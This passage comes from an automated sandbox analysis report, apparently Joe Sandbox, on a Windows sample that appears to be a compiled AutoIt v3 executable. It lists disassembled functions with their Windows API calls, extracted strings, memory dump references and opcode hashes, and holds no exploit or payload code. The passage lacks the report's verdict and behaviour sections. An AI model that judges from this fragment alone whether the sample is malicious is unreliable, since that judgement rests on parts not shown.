                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: b073c756e92ecc296baa838702e8edc59671edab1e8e67f3e0e1b0f5f52250be
                                                            • Instruction ID: bf7c1880107007591ae2039c9e61e98cffcde5d1b02fee211000810603d6b043
                                                            • Opcode Fuzzy Hash: b073c756e92ecc296baa838702e8edc59671edab1e8e67f3e0e1b0f5f52250be
                                                            • Instruction Fuzzy Hash: 1BA0113000020CAB8A022B82EC08888BFACEA002A0B008020F80C882228BB2A8208A80
                                                            Function 00378808 Relevance: .6, Instructions: 590COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8ecb3b411864700896b0c08094adabfcea3f5def49b58808b2743885ca84ad28
                                                            • Instruction ID: 65c18eceeb6d7a82d877eee3cc1ca41ffa57d7473ae4fae47cbd75890446dc5a
                                                            • Opcode Fuzzy Hash: 8ecb3b411864700896b0c08094adabfcea3f5def49b58808b2743885ca84ad28
                                                            • Instruction Fuzzy Hash: 06222830A48546CBDF3B8B18C4987BC77A1FB41308F26C46AD64A8BD92DB78DD92C741
                                                            Function 003821C5 Relevance: .3, Instructions: 345COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                            • Instruction ID: 5242e599189f461e1a6de7c7a2e7a608dfcf9580c15bc5c6be906cf5e35a9e6a
                                                            • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                            • Instruction Fuzzy Hash: 73C184362052930ADB6F663A843413FFAA55EA27B131B47DDD8B3CB1D4EE10C969D720
                                                            Function 003825FA Relevance: .3, Instructions: 341COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                            • Instruction ID: 5498737c918b1e34e90b3a72a3beeab4881fdaaf499d004d4fd30c258590ba76
                                                            • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                            • Instruction Fuzzy Hash: E2C165322052930ADF6F563A843413FBAA55EA27B131B47EDE4B3DB1D5EE10C929D720
                                                            Function 00381978 Relevance: .3, Instructions: 323COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                            • Instruction ID: 2b84ba12e3487ed2233d1c19762ab3b6109c4ac75c93119588f75b99806507e7
                                                            • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                            • Instruction Fuzzy Hash: 62C1843220529309DF2F5639C47413EBAA95EA27B131B47EDD4B3CB1D4EE20C96AD720
                                                            Function 016723D0 Relevance: .1, Instructions: 92COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1311110276.000000000166E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0166E000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_166e000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                            • Instruction ID: 367e1b8ead7e4dbf63a50109fe92ae5696d451adc3d2cc79dfb9a0c34f0b8f2c
                                                            • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                            • Instruction Fuzzy Hash: 3241D371D1051CEBCF48CFADC991AEEBBF2AF88201F948299D516AB345D730AB41DB40
                                                            Function 01672260 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1311110276.000000000166E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0166E000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_166e000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                            • Instruction ID: 7fdbe17f153baee9851c6818ceac0791897418aa853d86dcb578b81448d532ee
                                                            • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                            • Instruction Fuzzy Hash: 31019278A00109EFCB44DF99C5909AEF7B5FB48310F20859DD919A7701E730EE41DB80
                                                            Function 016722C0 Relevance: .0, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1311110276.000000000166E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0166E000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_166e000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                            • Instruction ID: bca86500ba3e510f927e23295f00e62e77693e97c9be59a274342df066d5f02d
                                                            • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                            • Instruction Fuzzy Hash: 23019278A00209EFCB44DF98C9909AEF7B6FB48310F208599D919A7701E730AE41DB84
                                                            Function 01670C40 Relevance: .0, Instructions: 6COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1311110276.000000000166E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0166E000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_166e000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                            • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                            • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                            • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                            Function 003E356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?,003EF910), ref: 003E3627
                                                            • IsWindowVisible.USER32(?), ref: 003E364B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpperVisibleWindow
                                                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                            • API String ID: 4105515805-45149045
                                                            • Opcode ID: 0b80d67fe27a95432494df5dab739f885dd5c0bef7a9b0d47c4a25506298d15a
                                                            • Instruction ID: 0f0448aa1331a45c2d916b896cde8ee8a7da4261f19692f38f30fcadce4595c2
                                                            • Opcode Fuzzy Hash: 0b80d67fe27a95432494df5dab739f885dd5c0bef7a9b0d47c4a25506298d15a
                                                            • Instruction Fuzzy Hash: A7D1CF702043509BCB0AEF11C45AAAE77E9AF85344F058569F8865F7E3CB35EE4ACB41
                                                            Function 003EA5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetTextColor.GDI32(?,00000000), ref: 003EA630
                                                            • GetSysColorBrush.USER32(0000000F), ref: 003EA661
                                                            • GetSysColor.USER32(0000000F), ref: 003EA66D
                                                            • SetBkColor.GDI32(?,000000FF), ref: 003EA687
                                                            • SelectObject.GDI32(?,00000000), ref: 003EA696
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 003EA6C1
                                                            • GetSysColor.USER32(00000010), ref: 003EA6C9
                                                            • CreateSolidBrush.GDI32(00000000), ref: 003EA6D0
                                                            • FrameRect.USER32(?,?,00000000), ref: 003EA6DF
                                                            • DeleteObject.GDI32(00000000), ref: 003EA6E6
                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 003EA731
                                                            • FillRect.USER32(?,?,00000000), ref: 003EA763
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 003EA78E
                                                              • Part of subcall function 003EA8CA: GetSysColor.USER32(00000012), ref: 003EA903
                                                              • Part of subcall function 003EA8CA: SetTextColor.GDI32(?,?), ref: 003EA907
                                                              • Part of subcall function 003EA8CA: GetSysColorBrush.USER32(0000000F), ref: 003EA91D
                                                              • Part of subcall function 003EA8CA: GetSysColor.USER32(0000000F), ref: 003EA928
                                                              • Part of subcall function 003EA8CA: GetSysColor.USER32(00000011), ref: 003EA945
                                                              • Part of subcall function 003EA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 003EA953
                                                              • Part of subcall function 003EA8CA: SelectObject.GDI32(?,00000000), ref: 003EA964
                                                              • Part of subcall function 003EA8CA: SetBkColor.GDI32(?,00000000), ref: 003EA96D
                                                              • Part of subcall function 003EA8CA: SelectObject.GDI32(?,?), ref: 003EA97A
                                                              • Part of subcall function 003EA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 003EA999
                                                              • Part of subcall function 003EA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003EA9B0
                                                              • Part of subcall function 003EA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 003EA9C5
                                                              • Part of subcall function 003EA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003EA9ED
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                            • String ID:
                                                            • API String ID: 3521893082-0
                                                            • Opcode ID: 8a943f98f87a88c828706090009dedfe911d471fef5bcb4d63bf7c4fce4f5fb3
                                                            • Instruction ID: 077a6ce94cf0156eafc80ccb246686e1501b28c34f4b342dcd8b29c20cb9d0ba
                                                            • Opcode Fuzzy Hash: 8a943f98f87a88c828706090009dedfe911d471fef5bcb4d63bf7c4fce4f5fb3
                                                            • Instruction Fuzzy Hash: C0918D72008795AFD7229F64DC48A5B7BBDFF89321F100B29F5629A1E0D7B0E944CB52
                                                            Function 00362C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DestroyWindow.USER32(?,?,?), ref: 00362CA2
                                                            • DeleteObject.GDI32(00000000), ref: 00362CE8
                                                            • DeleteObject.GDI32(00000000), ref: 00362CF3
                                                            • DestroyIcon.USER32(00000000,?,?,?), ref: 00362CFE
                                                            • DestroyWindow.USER32(00000000,?,?,?), ref: 00362D09
                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 0039C43B
                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0039C474
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0039C89D
                                                              • Part of subcall function 00361B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00362036,?,00000000,?,?,?,?,003616CB,00000000,?), ref: 00361B9A
                                                            • SendMessageW.USER32(?,00001053), ref: 0039C8DA
                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0039C8F1
                                                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0039C907
                                                            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0039C912
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                            • String ID: 0
                                                            • API String ID: 464785882-4108050209
                                                            • Opcode ID: 986a822bce7ca011f216d48f7af6a3211f593fa79db41da865db71f2759db27f
                                                            • Instruction ID: e26b407e7da92c6c6a05bc0dc00d1711e1c1aa01974e0e8128ca08820682128e
                                                            • Opcode Fuzzy Hash: 986a822bce7ca011f216d48f7af6a3211f593fa79db41da865db71f2759db27f
                                                            • Instruction Fuzzy Hash: 3D129D30614641EFDF22CF24C884BAABBE5BF45300F569569F895CB6A2C771EC42CB91
                                                            Function 003D74AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DestroyWindow.USER32(00000000), ref: 003D74DE
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 003D759D
                                                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 003D75DB
                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 003D75ED
                                                            • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 003D7633
                                                            • GetClientRect.USER32(00000000,?), ref: 003D763F
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 003D7683
                                                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 003D7692
                                                            • GetStockObject.GDI32(00000011), ref: 003D76A2
                                                            • SelectObject.GDI32(00000000,00000000), ref: 003D76A6
                                                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 003D76B6
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003D76BF
                                                            • DeleteDC.GDI32(00000000), ref: 003D76C8
                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 003D76F4
                                                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 003D770B
                                                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 003D7746
                                                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 003D775A
                                                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 003D776B
                                                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 003D779B
                                                            • GetStockObject.GDI32(00000011), ref: 003D77A6
                                                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 003D77B1
                                                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 003D77BB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                            • API String ID: 2910397461-517079104
                                                            • Opcode ID: ab5dadeb29b53afbdf15eda323c4150fde2b35368d74962d317e0c3b243aa4c9
                                                            • Instruction ID: 37aba0aa763873870e99743a2ce73540a4e49df4eb2eccfb27bd1fb44205bbac
                                                            • Opcode Fuzzy Hash: ab5dadeb29b53afbdf15eda323c4150fde2b35368d74962d317e0c3b243aa4c9
                                                            • Instruction Fuzzy Hash: 46A18471A00615BFEB25DBA4DC49FAE777DEB09710F108215FA14AB2E0D7B0AD01CB64
                                                            Function 003CAD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 003CAD1E
                                                            • GetDriveTypeW.KERNEL32(?,003EFAC0,?,\\.\,003EF910), ref: 003CADFB
                                                            • SetErrorMode.KERNEL32(00000000,003EFAC0,?,\\.\,003EF910), ref: 003CAF59
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DriveType
                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                            • API String ID: 2907320926-4222207086
                                                            • Opcode ID: a752ec6b6b71912533e09ae695150f896c8e81bc3709907f29179957d14ed4d2
                                                            • Instruction ID: c0f80f204004e6a5069744047aafc9990cdf08c7dcd52c94c954b9fff9d4ff24
                                                            • Opcode Fuzzy Hash: a752ec6b6b71912533e09ae695150f896c8e81bc3709907f29179957d14ed4d2
                                                            • Instruction Fuzzy Hash: 0251B3B0648A0D9B8B02DB20CD82FBD73A4EF48308B30855FF407EB690CA74AD41DB56
                                                            Function 003668DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                            • API String ID: 1038674560-86951937
                                                            • Opcode ID: d092373176bf587ea3e08169d8f338354cfcf4497425dc0548f975f35f69b934
                                                            • Instruction ID: eaccd9a74934b103b1d4003874998b834cf8663ee91c132ac638ac538f37f71e
                                                            • Opcode Fuzzy Hash: d092373176bf587ea3e08169d8f338354cfcf4497425dc0548f975f35f69b934
                                                            • Instruction Fuzzy Hash: 8181E5B1640305AADF23BB61DC83FBF37A8AF15740F048025FD05AF19AEB61DA45D6A1
                                                            Function 003E9A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 003E9AD2
                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 003E9B8B
                                                            • SendMessageW.USER32(?,00001102,00000002,?), ref: 003E9BA7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window
                                                            • String ID: 0
                                                            • API String ID: 2326795674-4108050209
                                                            • Opcode ID: a5c02333a722404dd9d25d6b1a0ab9d01708d2be18c851d687a039b8272843c1
                                                            • Instruction ID: f652ae33a2dff04b3136a72607b81b3e7dbc169f982711e044422d8b7586a9e6
                                                            • Opcode Fuzzy Hash: a5c02333a722404dd9d25d6b1a0ab9d01708d2be18c851d687a039b8272843c1
                                                            • Instruction Fuzzy Hash: 5902D2301042A1AFD726CF16C885BAABBE9FF89300F04872EF595DA2E1C775D945CB51
                                                            Function 003EA8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSysColor.USER32(00000012), ref: 003EA903
                                                            • SetTextColor.GDI32(?,?), ref: 003EA907
                                                            • GetSysColorBrush.USER32(0000000F), ref: 003EA91D
                                                            • GetSysColor.USER32(0000000F), ref: 003EA928
                                                            • CreateSolidBrush.GDI32(?), ref: 003EA92D
                                                            • GetSysColor.USER32(00000011), ref: 003EA945
                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 003EA953
                                                            • SelectObject.GDI32(?,00000000), ref: 003EA964
                                                            • SetBkColor.GDI32(?,00000000), ref: 003EA96D
                                                            • SelectObject.GDI32(?,?), ref: 003EA97A
                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 003EA999
                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003EA9B0
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 003EA9C5
                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003EA9ED
                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 003EAA14
                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 003EAA32
